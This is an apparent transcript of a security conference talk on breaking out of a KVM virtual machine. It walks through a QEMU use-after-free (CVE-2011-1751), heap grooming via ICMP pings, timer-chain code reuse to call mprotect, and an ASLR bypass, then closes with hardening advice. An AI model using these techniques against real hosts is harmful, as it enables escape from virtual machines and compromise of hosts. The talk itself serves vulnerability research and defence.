 All right, hi everybody. I'm going to be giving a talk about entitled virtual void breaking out of KVM, Linux kernel virtual machine. So what exactly is this KVM thing and why do I care about it? KVM is the sort of the new hotness for virtualization on Linux. It's a virtualization system that was developed sort of from scratch to be the official entry supported by upstream, you know, working friendly with the Linux community, virtualization solution that sort of started later than Zen and everyone else but has ramping up speed and has sort of become the officially blessed platform for a lot of distributions to do virtualization. And so it's an exciting new platform that I think is going to be seeing a lot of attention in security space soon. And so I decided to take a look at it and come up with some conclusions and share my results here. So who am I and why am I talking with you? My day job actually has absolutely nothing to do with this. I'm a kernel engineer at a company called CaseBlyce, but it does mean I spend a lot of time staring at low level software systems and so in my spare time I tend to do a lot of low level security stuff including this work on KVM. All right, so structure of this talk. We're going to start by taking a high level look at KVM at this Linux virtual machine. We'll look at what the different pieces are and how they fit together and then we'll go back and focus in on each of them from an attack surface perspective. From an attacker trying to break out of a KVM virtual machine what's interesting about which of each of the components, how are they exposed to the attacker, what kind of things should we be thinking about and looking for? And then we'll run into a deep technical dive into the guts of actually writing a breakout exploit against KVM, learning in the process a bunch about some useful features of the KVM architecture that come in handy and that we can exploit in creative ways. We'll start by just looking at the bug that my exploit centers around and then we'll just talk about the actual exploit that I wrote. Then I'll discuss some conclusions that I think are sort of implied by my work or suggested and some future directions that I hope to proceed in there or that I would love to see other people do work in. And then we'll demo the exploit because no talk on exploitation is complete without a non-stage demo to potentially screw up hilariously. It's been reliable so far. All right, so KVM, how does it work? There's three main components to the KVM virtual machine. There's KVM.KO, the core kernel module. Then there's a pair of kernel modules for supporting Intel and AMD hardware support and then there's a user-based driver program, QMU KVM. Looking a little bit at the function of each of those and where they sit, KVM.KO is the core of the kernel module, of the kernel side support for KVM. It's sort of responsible for emulating and tracking the virtual CPU and memory management unit, the core of the virtual machine using the X86 AMDs and Intel's hardware virtualization extensions. It emulates a small number of devices and input-output operations in kernel directly for efficiency, but for the most part it doesn't deal with emulating hardware. And then it also provides a large interface for user-based driver program like QMU KVM, which we'll talk about in a second, to communicate with it, to allocate new virtual machines, allocate new virtual CPUs on those machines, set up the emulated physical memory and all of that. And one of my favorite bits of trivia about KVM.KO is despite the fact that we're using hardware virtualization extensions here, which means that for the most part the virtual machine is just executed directly by the processor in a virtual machine non-root context, as Intel calls it. KVM still contains an entire X86 emulator in the kernel module that's used for handling certain rare traps. And just sort of from a code complexity and attack surface perspective, it's an interesting thing to know. KVM Intel and KVM AMD are the other half, really less than half of the kernel component here. They just provide the glue code for communicating with the hardware virtualization extensions. More or less you take those four chapters or whatever from the Intel manuals and implement the software half of that, and you get these. And they're relatively small, they're one C file, 4,000 lines or so each, which compared to any of the other components is tiny. And then finally we come to the user space component, QMU KVM, which is the direct user interface and user driver for the four KVM VMs. It's based on the classic QMU emulator, which I'm sure that almost all of you have heard of and probably even used because it's amazingly useful and handy. And in addition to providing the interface and driver loop, QMU KVM implements basically all of the virtual devices that your VM talks to because a virtual machine, much like a real machine, is not just a CPU talking to a block of memory. In order for it to be useful there needs to be peripheral devices, PCI buses that hang off all kinds of devices, your ethernet card, your display, a serial console, whatever, a timer device of some sort, all of that, all of that lives in QMU KVM. And it's responsible for emulating those devices. And devices are complicated, it turns out. And this, as a result, contains a huge quantity of code. It's an order of magnitude, more code than KVM.KO, even if you only consider the devices that are actually in use by a typical VM. If you consider all of the possible devices, it's even bigger. There's currently a project underway by the upstream Linux community to potentially replace this user space component with a separate developed more or less from scratch KVM binary that would be maintained in the Linux kernel tree. But that work is relatively new, it's not more than a year or two old, and it's going to be some years before it's stable enough that people are seriously using it and then some more years before distributions are actually shipping it and lots of people are using it into production. So if we're thinking about KVM, we're thinking about attacking or defending KVM for the near future QMU KVM is what we need to be talking about. All right, so those are the three main components. Now we can go back and take a look at each one with an eye for attack surface. KVM.KO for an attacker is a very tempting target because it runs in kernel mode on the host in ring zero. If I successfully find and exploit a bug here, I have ultimate privileges on the host with no further exploitation or privilege escalation needed. However, despite being a tempting target, it's also a bit of a tough target because there's not very much code there compared to this user space component. And what code there is is much of that is dedicated to interfacing with the user space component and so it's not directly available for attack by a guest. That X86 emulator that I mentioned is definitely an interesting target because there's a lot of code there that is rarely exercised because the emulator is only used in some edge cases and that's sort of whenever I'm automating a system, lots of subtle code that's rarely used is sort of the first place that I look for bugs. There have been a number of interesting bugs there that allowed privilege escalation within a guest because of bugs in the X86 emulator. So there is a bit of a track record of bugs. There aren't as interesting as breakout bugs but again, it's a hint that this is an interesting place to look. It's unfortunately not the focus of this talk but it's something that I want to highlight because I think future research should take a close look here. And then in addition to privest within the guest, just if we're talking about KVM.co, we should keep in mind that there's also the possibility of privilege escalation in the host because unprivileged users can communicate with this privileged kernel module. Just, you know, another thing to note if we're looking at the whole scope of KVM exploitation. KVM Intel and KVMAMD.co, the kernel modules that interface with the hardware are not super interesting targets because there isn't a ton of code there. It's mostly sort of straight line code that just translates between, you know, the kernel's data structures that represent the VM and how the hardware wants to model those and just bridges back and forth. But there's a lot of subtlety and complexity in interacting with these hardware components. And so there's potentially scope for some interesting bugs where the KVM is using the hardware support slightly incorrectly or in an interesting or in an unusual way that allows for interesting attacks. But it's not the first place I'd look. And then finally we come again to QMU KVM, which as you can probably guess by now is the easiest place to look for targets here. Hundreds of thousands of lines of code, emulating device code so the devices are talking directly to the guest via emulated memory mapped IO or IO ports. So they're parsing control structures that the guest is exporting and communicating this, you know, these strange arcane hardware protocols. Lots of interesting code. And much of this code comes straight from QMU, which is mostly written by one guy, Fabrice Belarde, who is an absolute genius brilliant programmer, but just one guy spewing out code over years with no one auditing it, bugs are going to happen. The one unfortunate thing about this as attackers is that it is often sandboxed using SE Linux or app armor or some other technology. And so if we do successfully break out from KVM into QMU KVM and get code execution in that process, we'll probably need another privilege escalation attack to get full privileges on the host. Fortunately, we're all running Linux, which as any slash dot reader knows has no bugs whatsoever, so we should be safe. All right. So that's the structure of KVM and taking a bit of look at the attack surface. And now we're going to dive in on our bug, which is in fact, and the bug that I use, which is in fact a bug in QMU KVM in that user space driver program. I've got here the text from the Red Hat security advisory, the bug is CVE 2011 1751, all the major distributions have hatched shit by now, so you can go look it up. The Red Hat describes it as, we just found that the PIIX4 power management emulation layer did not properly check for hot plug eligibility. So what does that mean? First off, what is PIIX4? PIIX4 was an actual physical chip that was the south bridge in most circa 2000 Intel chip sets. And since it's a south bridge, what that means is that it talks to it, most of the physical devices in chip computers of that era hung off of the south bridge architecturally. And so the PCI bus, the ACP support, the real time clock, all of that stuff, the host, the CPU communicates with through the south bridge. And this is the default south bridge chip that QMU emulates. It supports PCI bus and it supports PCI hot plug. It supports in physical hardware, what this would mean is it can do a hot plug device, the chip and instructs the PCI bus to electronically disconnect it so that you can pull it out and be safe. In a virtual machine, what this just means is that we disconnect the virtual mappings for those IO ports and free the memory backing that device. It's expected that the destructor function for a virtual device performs this successful unplugging of everything. But not every device in QMU was implemented under the expectation that it might be hot plugged. And so many of these destructor functions are, some of these destructor functions are no ops or insufficiently clean up state. And that's supposed to be okay because you're not supposed to be able to hot plug these devices. And so it's okay if they don't successfully clean themselves up. But it turns out that, as the advisory says, it insufficient checks for hot plug eligibility. The PIX4 PCI hot plug path, if you handed it a device, an identifier on the PCI bus to hot plug, it would just blindly go and hot plug it without actually checking the flag that says this is a hot plugable device. In particular, a tempting target is the emulated ISA bridge. So who here actually remembers, you know, physical ISA cards and ISA buses? All right, most of us. We don't have those anymore, at least, you know, outside of, you know, hobbyist, you know, archaic hardware shows. But it turns out that your South Bridge, even in your modern Intel chipsets, has an emulated ISA bus with emulated with virtual ISA devices hanging off of it. And QMU faithfully emulates this behavior and has a bunch of virtual ISA devices hanging off of a PCI ISA bridge. And we can just unplug that and all of those ISA devices, which include such things as the real-time clock that keeps, you know, calendar time on the virtual machine, just go away. And that real-time clock, it turns out, is not expecting to be unplugged. In particular, it leaves around, it's a real-time clock, so it has timer events that it uses to keep track of the real-time. It leaves those timers hanging around on QMU's run loop. And so we can just sort of look a little bit at what this means in code. The real-time clock is emulated by this struct RTC state at the bottom of the screen. And it has this second timer that it just schedules to get fired every second so that it can update the time. And if we look up above at how a QMU timer works, it just has an expire time that says when this timer should fire. And then it has a callback and an opaque pointer that is passed to that callback. And so once a second, the QMU timer fires and calls this RTC update function on that RTC state struct. But if we free it, it frees the RTC state structure, but it doesn't free or unregister actually either of the timers it used. I've only shown the one that's relevant for this exploit. And so we're left with dangling pointers. That opaque pointer there is actually used as a pointer to the RTC state. And so we have a dangling pointer to a free object. And so within a second later, with the next second tick, we call this RTC update second function on a freed object. And we have a classic use after free bug here. As those of you who are exploit developers probably know, that's almost the most beautiful case you could hope for today for an exploitable bug is a use after free like that. And just to show how easy this is to reproduce, that's the reproducer. Compile that program, run it as route in a Linux machine on a vulnerable version of KVM, and KVM will seg fault. And you know, all this does is IOPL just gets privileges to be able to write out IOPORTS and you write a single value to a single IOPORT and boom. In fact, this bug was found by a fuzzer that just literally wrote random values out random IOPORTS and eventually it stumbled on this value and I get a signal 11 and I went and debug it and then wrote this talk. All right. So that's the bug. So we have this beautiful use after free. But so what does it take to in the KVM environment go from a use after free like this to a working exploit? We'll talk about this process in three stages. You know, first off, how do we go from this use after free to controlling the instruction pointer? How do we get KVM to jump to some address that we specify? And then once we have that, how do we leverage that into executing arbitrary shell code inside the guest? And then once we have and then I will have talked about those two assuming that I can guess addresses in the QMU KVM process, i.e. that there's no address space randomization in the process that I can predict addresses. And then we'll talk a little bit about what we have to do to get rid of that assumption, to work on a process with a randomized address space like KVM is going to be in the wild on any real deployment. So for getting RIP control, the high level to do is sort of fairly straightforward if you look at how the code works is we're going to need to create a fake QMU timer object that we control and you know, inject that at a known address, then we'll trigger the eject, we'll dump the ISA bridge, and then we will force an allocation into the space previously occupied by the RTC state structure that points that second timer field at our timer. Then on the next second boundary, RTC update second will run on our fake RTC state and it will reschedule the second timer to run one second later. But we've hijacked that pointer to point at our timer and so one second later our timer will run which includes the our callback method that it will jump into and it will jump to code that we control. So there's three steps here. I've already shown you how to do number two, how to eject the ISA bridge and sort of actually trigger the vulnerability which leaves two things left to talk about. One, how do we construct fake devices in QMU KVM's address, fake structures in QMU KVM's address space? How do we get objects that A, appear in that address space somewhere so that we can write pointers to them and B, appear at a known address or find out that address so that we can predict that address and write that second timer pointer to point at our thing. So this is one case where exploiting a virtual machine is actually sort of in some ways has a unique advantage over many other types of exploits is that that process turns out to be incredibly simple. The way that QMU KVM handles the emulated RAM for the guest is that it's just a big M map region in QMU KVM's address space. That is the physical RAM of the guest. So there is no injection portion like I talked about here actually at all. We just literally allocate an object however the hell we want statically M map it allocated on the stack whatever we feel like find the physical address of that in find the physical address in the guest which we can do in a couple of ways you know if we can do in kernel mode by walking the page tables explicitly or the kernel actually it turns out exports a proc file that will just give us this information. But you know clearly we can find that from the guest and then we just add that to the base address of the M map in the host process and we found that object. For now we're going to assume that we know the base address of that M map because this base address is predictable assuming no ASLR and again we'll talk about how to get by that assumption later. So that's step one is injecting data at a controlled address actually totally easy when you're attacking a virtual machine. And this is true I believe in basically actually all current virtual machines do this or something similar. So this is not totally unique to KVM. Although this is the first exploit I'm aware of that's talked about this technique. Second technique is forcing allocations inside the QMU KVM process. We need to get QMU KVM to do a malloc and then populate it with data that we control of an appropriate size that it will with high probability get allocated into the space that destruct RTC state used to occupy. To do that I'm going to use a feature of the QMU KVM network stack that I'll talk about. QMU KVM inherits from QMU a user mode networking stack that implements an entire virtual LAN inside the QMU KVM process. This is used as a way of allowing you to get network access to the guest without having to mess around with bridge devices and ton tap devices or other such madness on the host and also without requiring privilege on the part of the QMU KVM process. It's the default networking setup so it's a reasonable thing to attack. Although in production environments it's probably more common that we'll see bridge networks or something else. And so we'd have to modify this step there. But the same fundamental principles of most of the attack would apply. So this virtual network stack emulates a DHCP server and Gateway NAT all plugged into this virtual LAN. The way that this virtual LAN handles packet delivery is that normally packets are handled synchronously. When you inject a packet onto the virtual LAN it just looks up the recipient and you know calls their deliver packet callback method synchronously. And so there's no buffering, no queuing. But in order to prevent recursion if a virtual device or virtual host's deliver mechanism then injects a second packet in response to the first packet that packet is queued using malloc with a small header appended and then delivered later once we've returned to the main run loop. So if we can find a device on the virtual LAN that responds to packets from the user by synchronously generating a second packet whose contents are all or almost all controlled by the contents of the first packet then that will generate a malloc with controlled contents. Can anyone think of a network service that has that property? Ping, ICMP ping echo packets. So the way we're actually going to force allocations inside the guest is by pinging the virtual Gateway. And it will reflect the ICMP packets back at us with the payload of length we control and contents we control which will force mallocs and let us exploit this use after free. And so now putting the pieces together we allocate a fake QMU timer in our address space with a callback method pointed at whatever address we want KVM to jump to. We'll calculate its address in the host using the arithmetic I showed earlier. We'll do that eject dance and then we'll ping the emulated Gateway as fast as we can with ICMP packets that are have pointers to our fake timer in the host. And with extremely high probability basically one one of those will end up allocated into the space previously occupied by the RTC state and we'll win. We have the ability to get the QMU to jump to an address we control. All right. So that's part one. We have RIP control. We can get QMU to jump to any address we want. But we still have to deal with non-executable pages or injecting shell code somehow. We're not quite there yet. So what are our options to do next? We'll start with the classics. We can set EIP equals 41414141AAAAA and declare that that clearly demonstrates it's possible and you know we're done. That's born. I could disable NX, non-executable pages in my BIOS or in my kernel and you know just blast shell code wherever the hell I want and jump to it. That's also boring. Getting more interesting, we could use a technique called return-oriented programming to chain together bits of QMU's own code to do the standard M-map or M- protect to allocate executable shell code and then jump into the shell code that way. It's a standard technique used in most exploits these days. It would be a perfectly fine strategy here, but I have a slightly different strategy that I happen to like that I stumbled upon here that I think has some cleaner properties and was easier developed than doing a rough payload and so we'll talk about that. So let's take another look at that QMU timer structure that we're faking. So we focused on the callback and opaque method members before, but now let's look at this expire time and this next pointer and so the way that these timers are implemented is they're stored in a sorted linked list threaded through by that next pointer and every time we the QMU main loop wakes up it runs these timers which just walks these timers by that next this linked list by following that next pointer as long as that expire time is before the current time and so we control that next pointer because we control this entire timer. So what we can do is construct multiple timers and chain them together by that next pointer so that we can cause QMU KBM to execute multiple functions in a row and perform sort of you know limited strings of computation in the host rather than just doing one jump and we're going to point these functions at existing functions inside the host that we're going to string together in an unexpected way. So this is this is sort of halfway between return to the traditional return to libc attacks and ROP attacks with you know a slightly unorthodox method of doing the dispatching. So now one feature we notice here is that we have a large number of one argument function calls. We want to do more argument function calls. So to do that we're going to dive a little bit into a detail of the AMD64 calling convention how it works. So on AMD64 which I'm assuming we pass arguments to functions in registers starting with RDI, RSI, RDS etc. So RDX is the first argument. That's going to get the opaque member of our fake timers. RSI we don't directly control. However, every compiled version of QMU run timers that I've encountered leaves RSI untouched. It doesn't clobber RSI. So suppose that we found a function that looked like this hypothetical set RSI function. It sets the RSI register based on the RDI register which is the first argument register. So back if we go back to our chain of function calls we set F1 to set RSI and we pass it some argument. And so then we're going to populate RSI with that first argument, that argument to the first timer. RSI is going to get populated with that. And then we call the second function we now control both arguments. So we can get to two arguments this way. The same trick doesn't work with RDX, the third argument register, because QMU run timers does clobber that. And so we can't count on it being preserved across different timers, timer calls. So we'll talk about what we do there in a second. First this, so this function happens to be the set RSI gadget that I chose. What this actually does in QMU is relatively unimportant. But the detail is it takes a value as its first argument and then it calls a function with that value as the second argument. Which means that it moves it into RSI. And so as long as we choose a value of adder that makes IOPORT write a NOOP or other, or you know, mostly harmless operation. This has the effect of populating RSI from RDI. So that's that. So now to get to a three argument M protect call, because M protect, which is what we want to call, is to set things executable. We need to call it with an address, a length, and a protection value that we want to contain at least prot exec. A little bit of searching for useful patterns with some grep finds us this interesting function, IOPORT redale thunk. Again, what this is actually supposed to do, totally irrelevant. But it takes two arguments, which again we control, and then it follows some function pointers. To call it, so we control those function pointers, to call it on an address we control with a size that we control with a third argument that just conveniently happens to be equal to prot exec. So it will set that memory executable. All right. So to put the steps together, we need to allocate a fake IO range operate op struct, which is that operation structure. We need to set the read op to M protect. We need to allocate an IO range object that needs to be page aligned because we're going to call M protect on it. And it has ops pointing at fake ops and base is set up such that that adder minus IOPORT base computation yields a useful length. And then we're going to copy our shell code into that same page immediately following the IO range. And then we'll do this timer chain. We'll call CPU out L to set the second argument registered zero because that happens to be a value that makes IOPORT read, which IOPORT write up here harmless. And then we do this IOPORT read L thunk, which through this hilarious chain of indirection will result in an M protect. And then we'll just jump right into that fake IOPORT plus one, which is where we stuck our shell code. All right. And so that works. Turn off ASLR, code up all the offsets right, and you've got code execution. And so one question before we jump into getting by ASLR is why didn't I use ROP? Return oriented programming is a standard well understood technique that is the standard way to write these exploits. Why do I do this more creative thing? There's a couple of reasons. One is that this mechanism makes continuing execution in the makes the, you know, getting the QMU KVM process to continue executing dead simple because we're not corrupting the stack. We're not really smashing any state. We're just sort of hijacking the legitimate functionality of the run loop. And so after all of this returns, everything is actually, except for, you know, the things that we freed as a result of our exploit, everything is in a sane state and we can just continue executing. Another thing that I like about this technique is that I've shown you virtually no assembly on the previous few slides. I've referred to one detail, but there's very little dependence on how these functions actually got compiled. And ROP cares very deeply about how the functions got compiled because you're chaining together strings of assembly. When you're exploiting a program under Linux, you have to deal with the fact that every Linux vendor has their own build of the program with a slightly different source version, a slightly different GCC version, a slightly different set of flags. And so if you want to have to try to find ROP gadgets across every single one, it's a fair amount of work and there aren't yet great tools for doing this in a completely automated fashion on Linux. Whereas here I just need to look at the source and then I just need to grab the symbol table from all of those different versions and I have all of the addresses I need because they're just functions that exist in the C code and so are more or less preserved across compilation by different versions. And then finally the cop out answer is that I'm just personally not that good at ROP. I don't know great tools for doing it on Linux and so I decided to try something different. Alright, so we've got code execution but I've been assuming no ASLR. So let's get rid of that restriction. So we need two addresses. There's fundamentally two addresses that we've been using. One is the base address of the QMU KVM binary. If we assume we're attacking a known binary we know the layout of all of the functions in memory and so we know their offsets from the executable base but we need to know where that executable is loaded. And secondly we need to know the address of that physical memory mapping inside QMU KVM in order to in order to get the address of fake objects we're injecting. So there's a couple of answers here. The classic answer is find a sufficiently powerful information leak that lets us leak the contents of pointers or the contents of memory and back solve or back derive somehow these addresses from leaked information. That's a classic way of doing this. I didn't end up going that way. I decided to do again something else that I think is a little more informative and interesting. The second option is we can take advantage of the fact that every major distribution still compiles KVM as non-PIE not as a position independent executable. If you're not familiar with implementation of address based randomization what this ends up meaning is that the QMU KVM actual core ELF binary is loaded at a fixed address every time. It's always loaded at the same address and so addresses in the binary itself are not subject to randomization and we can assume that we know them. So we can just assume that we know for a given binary all of those code addresses. And that means that the only thing we have left to find is the fizmem base address. To do that we're going to use yet another obscure feature of QMU KVM that comes in handy here. There's this FWCFG for firmware configuration subsystem in QMU KVM. It's sort of a virtual device that emulates two IO ports. You're not supposed to know or care about it because it's used by QMU's BIOS to communicate with the emulated hardware. But it's just listening on IO ports there's no reason other software that's not the BIOS can't talk to it. Its purpose is to export data tables that the BIOS needs such as the E820 map that describes the layout of physical memory, the ACP tables that describe how to interface with the emulated ACP hardware etc. It also has support for the BIOS feeding information back to the emulated hardware. This is a little odd in that as of the versions that I checked this support for writable tables isn't actually used anywhere in QMU KVM. There's actually no place that it exports tables that the BIOS is expected to write. But the infrastructure is there and not only is it there it actually lets the BIOS or any software write to any of these exporting tables. And conveniently several of these tables are backed by statically allocated buffers inside the host. Which means again assuming no PIE they're loaded as part of the ELF binary at fixed addresses. Which means that we can write to them we get nearly 500 bytes of writable data at a fixed static predictable address even under ASLR. So that's enough that we can inject our fake timers and our fake structures into that space rather than into the backing memory map. There's one complication which is that mProtect as I mentioned needs a page aligned address. And so a 500 byte region is not likely to land on a page aligned address if you know it's allocated if it's at a random offset which it basically is. So what we actually need to do is we, or what I did at least is we construct a different set of fake timer chains using the same techniques that does basically a read for. It reads four bytes at an address we choose from the guest and then it writes it to a space or from the host process and it writes it to a space that's visible to the guest. And so we use that read for basically as an information leak. We build up our own information leak and we chase pointers using those reads to derive the value of that physical memory base map. Once we found the address of that mapping we proceed exactly as before. There's a little bit of complexity here is that now this means we actually do that read for then do computation based on the results of that read and then execute more gadgets in the host. So rather than ending our timer chains with next equals null we actually end them with another timer that calls that RTC update second function again which remember it takes it follows pointers to find a timer and then schedules that timer at one second in the future. So we execute this chain, we do the read for and then one second from now a timer that we control will again get executed but until then the host returns to the guest context. The guest can do arithmetic, do computation glue bits together based on that read and then one second later we'll jump back into another set of gadgets and so we use this to chain multiple timer chains one after another with guest execution in between. And so that then is what it takes to at least the steps that I took and you know the broad steps what it takes to make this exploit work against ASLR bypassing non-executable pages and work completely on a stock install of KVM from vendor and we'll demo that in just a moment. So before we get to the demo so that I can end the talk on the high note with the demo we'll talk about a couple of conclusions that I think are thoughts that are raised by this work. One thing I want to emphasize that I hope this work emphasizes is that virtual machine breakouts aren't magical at all. I think there's often a tendency that virtual machines are kind of magic honestly. They do this weird thing where you get to the hardware and they do that by doing lots of crazy low level hardware and software tricks to make it possible. And so people tend to assume that attacking virtual machines must be at least as complicated as writing one in the first place and so therefore they're probably a pretty strong security layer. But that's just not true. All of the usual software protections ASLR, NX, etc. apply to virtual machines but virtual machine breakouts typically are memory corruption bugs like any other bugs and frankly today I would prefer to be attacking a virtual machine than a modern web browser because the state of mitigating exploits and defending exploits in sandboxing is much more advanced there. And so virtual machines don't think of them as magic security boxes. They're just as vulnerable to anything else and of course as you might expect these devices are the weak spot. And just sort of to drive this point home and to give some context we'll take a brief look at some past virtual machine breakouts. In 2008 Invisible Things Lab put out this paper Adventures with a Certain Zen Vulnerability where they demonstrated a Zen breakout. The bug that they were exploiting was an integer overflow in the para virtual frame buffer and they did much the same standard tricks that I did you know to see or return oriented programming to mBretact to copy a buffer in and then jump into it. Immunity at Black Hat 2009 presented Cloudburst a breakout exploit for VMware. Again missing bounds checking in the virtual SVGA device get memory corruption entirely same techniques. And then just to give a sense of where virtual machines can get interesting in just earlier this year Invisible Things Lab again put out another attack against Zen but this one based on a bug in the way that Zen uses Intel's VTD which is the IOMMU and hardware IOProtection technology. It turns out that if you turns out that there was a subtle bug in the way that interrupts were handled that actually allowed a guest to escape. And so that's an example of the kind of thing I was talking about might be possible with the KVM AMD tools is that these things are complicated and there probably are subtle attacks that involve the hardware interaction. But once again, the actual primitive that they got out of that attack was memory corruption in the host. And so from there they proceeded in exactly the same set of techniques that everyone else uses for exploiting memory corruption bugs. And so virtual machines are interesting but they're not that much more interesting, they're not that much more secure than anything else. So further work that I want to see done and that I'm going to be pursuing is in hardening KVM. The first take away is that you absolutely should be sandboxing QMU KVM if you're running it in a production environment. Fortunately if you're running it at least under Ubuntu or Red Hat via Libvert, they are already sandboxing it using SE Linux and App Armor. And I haven't yet but I want to take a look at those sandboxes and see how hard they are. But at least this is work that people do realize needs to be done. But if any of you are deploying KVM make sure, KVM in a remotely possibly sensitive context, make sure that you're using a technology that gives you that sandboxing. I think another no-brainer is I'd like to see the distributions start building QMU KVM as PIE, as full position independent. The traditional reason not to do this is performance because it costs an extra register to build this PIE. But virtually no one is running KVM on 32 bit platforms anymore and AMB64 has enough registers that the performance impact is really negligible. I haven't done benchmarks on KVM it's also on my to-do list but I think that's an obvious thing that will improve the state of the world. Then we can try some crazier ideas. We can try to make things a little bit harder. The standard technique of XOR encoding is XORing them with some constant value that's stored at some address and then on XORing them when you get them out so that if a memory corruption bug tries to clobber them they'll just basically end up with a random address. I think we'll need to do a little more thought to figure out which things are likely to be targets and might be worth applying this technique to. But it's a standard technique that's used to harden applications against memory corruption bugs and I think it's time that we start asking the question of and we can try doing even crazier things like protecting that guest memory region by lazily mapping or protecting regions of it or sandboxing individual devices so that they you know run in a thread that somehow only has a view into that specific piece of memory and this is a topic that there's been I've seen some discussion on the KVM lists but that I think hopefully this work demonstrates does have potential value and of course I want to see more people looking at QMU KVM and auditing it and fuzzing bugs. Some future research directions from the offensive side I want to go after KVM.KL I'd like to see someone else look into it because I think that there probably are bugs there and we should understand those bugs and we should fix them. Another interesting question that I don't know the answer to and I want to know the answer to is how hard, given that I know that I'm running in a guest on QMU KVM, can I fingerprint the exact QMU KVM version by comparing the behavior or possibly even more subtle timing attacks against the memory layout or something because I've been assuming that I know which QMU KVM binary I'm running against. In the wild you can usually assume that you're running against a distro's binary but that's still a range of binaries. So how well can we fingerprint which will give us an understanding of how weaponizable these attacks really, how general these such exploits can be done. And then another question is what do you information leaks in QMU KVM look like? Assuming that we get things built as fully randomized, we're going to start wanting to find information leaks to extract addresses in order to write these kinds of exploits. Is there a whole class of information leaks that we haven't realized yet or whole classes where the standard idioms that QMU uses for have a tendency to leak addresses in a way that we hadn't realized analogous to Dan Rosenberg's work on the Linux kernel where he demonstrated that as small as a four byte leak of uninitialized memory can reliably be used to deduce kernel addresses with a bunch of cleverness. So that's sort of my immediate checklist of future work on KVM and I also hope to improve my fuzzer and point it at other virtual machines because I don't know what to do with it. But for KVM this is my checklist and if you're interested in any of these I encourage you to talk to me and share thoughts whatever you have. So finally after all of that talking at you it's time to demo my exploit in progress in action. So, well that text is not relevant. I just ran a shell script that launched a KVM VM and I hope it's not super relevant but so I'm booting KVM just into an Ubuntu kernel just to show that this is a working KVM virtual machine. You know we're in a VM proc CPU info shows that we're running a QMU CPU and the way that I've implemented this exploit is that because we are hot plugging the ISA bus there are a lot of virtual devices that go away and if anyone tries to use those there's a high risk of the machine seg falting which is not useful if we want to exploit it. So I've actually packaged my exploit into an initRD that just contains a statically compiled version of my exploit and a minimal kernel that doesn't use any of those vulnerable devices and I've put it in grub so that we can boot straight into the exploit and greatly increase the reliability of this attack. So we'll reboot the VM now and from the grub prompt we'll select my exploit. It's doing things, chasing pointers and we pop up a calculator in the host. And obviously as I'm sure most of you are aware the calculator is the standard yes I've exported a demo but that could be arbitrary code. Um and alright as you can see here the guest kernel is very upset that it's real time clock has gone away but it's valiantly leveling forward. Alright so that is the end of this talk the goons have told me that I shouldn't bother heading to the QA room because there's no one after me so if you have questions just head up here and we can chat.